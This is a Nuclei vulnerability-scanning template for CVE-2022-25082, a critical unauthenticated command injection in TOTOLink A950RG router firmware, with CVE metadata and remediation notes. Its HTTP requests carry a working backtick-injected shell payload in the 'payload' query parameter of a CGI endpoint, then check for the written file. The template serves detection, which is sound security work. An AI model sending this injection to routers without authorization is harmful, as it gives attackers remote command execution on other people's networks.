TOTOLink - Unauthenticated Command Injection
ID: CVE-2022-25082
Severity: critical
Author: gy741
Tags: cve,cve2022,totolink,router,unauth,rce,iot,intrusive
Description
TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the Main function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.
YAML Source
id: CVE-2022-25082

info:
  name: TOTOLink - Unauthenticated Command Injection
  author: gy741
  severity: critical
  description: |
    TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the Main function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.
  remediation: |
    Apply the latest firmware update provided by the vendor to fix the command injection vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/cve-2022-25082
    - https://github.com/EPhaha/IOT_vuln/blob/main/TOTOLink/A950RG/README.md
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-25082
    cwe-id: CWE-78
    epss-score: 0.0417
    epss-percentile: 0.92196
    cpe: cpe:2.3:o:totolink:a950rg_firmware:4.1.2cu.5204_b20210112:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: totolink
    product: a950rg_firmware
  tags: cve,cve2022,totolink,router,unauth,rce,iot,intrusive

variables:
  cmd: "`ls>../{{randstr}}`"

http:
  - raw:
      - |
        GET /cgi-bin/downloadFlile.cgi?payload={{cmd}} HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /{{randstr}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - .sh
          - .cgi
        condition: and

      - type: word
        part: header_2
        words:
          - application/octet-stream

      - type: status
        status:
          - 200
# digest: 4a0a0047304502201d622d242eafd25733b530d1a066e43b0050808963d3238ba612069f0e5e57c80221008bbf87766815245758b580ad093cef8b30bc8c980c477531d41978088b7355bf:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-25082.yaml"